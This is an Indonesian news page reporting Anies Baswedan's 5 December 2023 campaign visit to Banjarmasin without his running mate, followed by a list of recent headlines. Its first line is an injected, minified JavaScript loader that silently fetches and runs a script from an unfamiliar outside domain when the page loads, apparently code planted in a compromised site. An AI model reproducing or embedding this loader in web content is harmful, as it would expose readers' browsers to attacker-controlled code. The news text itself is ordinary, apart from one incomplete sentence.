(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Capres Anies Baswedan di Banjarmasin Tak Didampingi Cak Imin


KANALKALIMANTAN.COM, BANJARMASIN – Calon Presiden (Capres) Koalisi Perubahan Anies Rasyid Baswedan tiba di Kota Banjarmasin, Provinsi Kalimantan Selatan (Kalsel), Selasa (5/12/2023) pagi.

Kedatangannya dalam rangka melaksanakan kampanye dengan para pendukung dan relawan yang ada di Kalsel.

Tiba sekitar pukul 10.30 Wita, Capres nomor urut 1 itu memulai kampanye dengan menyapa sejumlah mahasiswa yang telah menunggunya di Wetland Square, Jalan Ahmad Yani Kilometer 4, Kota Banjarmasin tepat diseberang Kantor KPU Provinsi Kalsel.

Baca juga: Mulyadi Akui Tak Setor ke Kas Daerah, Kasus Korupsi Sidang Program DPKUP di HSS

Kedatangannya tanpa didampingi Calon Wakil Presiden (Cawapres) Muhaimin Iskandar.

Anies terlihat datang menggunakan mobil Alphard berwarna putih didampingi istrinya Fery Farhati.

Ketua Umum Dewan Pimpinan Wilayah (DPW) Nasdem Kalsel, H Mansyur juga terlihat hadir mendampingi Capres Koalisi Perubahan tersebut.

Di salah satu ruang Wetland Square, Sekretaris Jenderal (Sekjen) Dewan Pimpinan Pusat (DPP) Partai Keadilan Sejahtera (PKS) Habib Abu Bakar Al Habsyi.

Baca juga: Bawaslu HSU Minta Panwaslucam Optimalkan Pengawasan Masa Kampanye

Sebelum masuk ke ruangan yang telah dipenuhi mahasiswa, Anies sempat mengamati sebuah spanduk besar bertuliskan ‘Kalsel Darurat Bencana Ekologi’ yang sengaja dipasang di sekitar lokasi Wetland Square.

“Saya senang sekali, karena ini adalah hari kerja jam kerja, dan teman-teman ikhlas datang ke sini,” ucapnya di hadapan para mahasiswa.

Selain menyapa mahasiswa, di hari yang sama sekitar pukul 13.00 Wita Capres Anies Baswedan juga diagendakan akan melakukan pertemuan dengan para habib dan ulama se Provinsi Kalsel di hotel Galaxy Banjarmasin.

Baca juga: Kembalikan Uang Negara Rp188 Juta, Mantan Kades di Tapin Tetap Tunggu Vonis

Kunjungannya selama sehari di Kalsel akan diakhiri dengan pertemuan terbatas dengan para pendukung dan relawan di gedung Sultan Suriansyah Banjarmasin sekitar pukul 15.00 Wita.

Setelah itu, Anies Baswedan diagendakan langsung bertolak ke Bandara Syamsudin Noor untuk melanjutkan perjalanan kampanyenya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

18 menit ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

1 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

5 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

8 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

8 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

22 jam ago

This website uses cookies.